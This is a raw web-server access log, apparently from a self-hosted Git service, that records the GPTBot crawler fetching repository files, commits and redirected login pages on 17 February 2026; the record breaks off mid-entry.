"/windpacer/homepage/raw/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:16:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:16:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" +[17/Feb/2026:16:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html?display=source" [Client 74.7.227.38] [Length 31033] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" +[17/Feb/2026:16:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 13549] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" +[17/Feb/2026:16:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16168] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14294] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/compare/main...main" [Client 74.7.227.38] [Length 8410] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/compare/main...main?expand=1" +[17/Feb/2026:16:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/compare/main..main" [Client 74.7.227.38] [Length 8387] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/compare/main...main?expand=1" +[17/Feb/2026:16:30:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:16:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/metadata.json" +[17/Feb/2026:16:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14414] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" +[17/Feb/2026:16:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" +[17/Feb/2026:16:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json?display=source" [Client 74.7.227.38] [Length 11031] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" +[17/Feb/2026:16:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11283] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" +[17/Feb/2026:16:30:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/index.html" +[17/Feb/2026:16:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/index.html" +[17/Feb/2026:16:30:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/index.html" +[17/Feb/2026:16:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/index.html" +[17/Feb/2026:16:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11870] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" +[17/Feb/2026:16:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 37580] [Gzip 7.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:16:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 5308] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11427] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:16:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 9788] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" +[17/Feb/2026:16:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:16:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels?sort=leastissues&state=" [Client 74.7.227.38] [Length 7638] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/labels" +[17/Feb/2026:16:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 12087] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" +[17/Feb/2026:16:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" +[17/Feb/2026:16:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2fmain.cpp" [Client 74.7.227.38] [Length 30030] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" +[17/Feb/2026:16:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2f.vscode" [Client 74.7.227.38] [Length 26837] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" +[17/Feb/2026:16:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11771] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" +[17/Feb/2026:16:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11770] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" +[17/Feb/2026:16:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11754] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:16:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/docker-compose.yml" +[17/Feb/2026:16:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:16:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/docker-compose.yml" +[17/Feb/2026:16:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=name&state=open" [Client 74.7.227.38] [Length 8469] [Gzip 2.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" +[17/Feb/2026:16:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 7791] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" +[17/Feb/2026:16:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10637] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:16:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29830] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:30:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:16:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/metadata.json" +[17/Feb/2026:16:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=name&state=all" [Client 74.7.227.38] [Length 8463] [Gzip 2.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=name&state=open" +[17/Feb/2026:16:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" +[17/Feb/2026:16:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 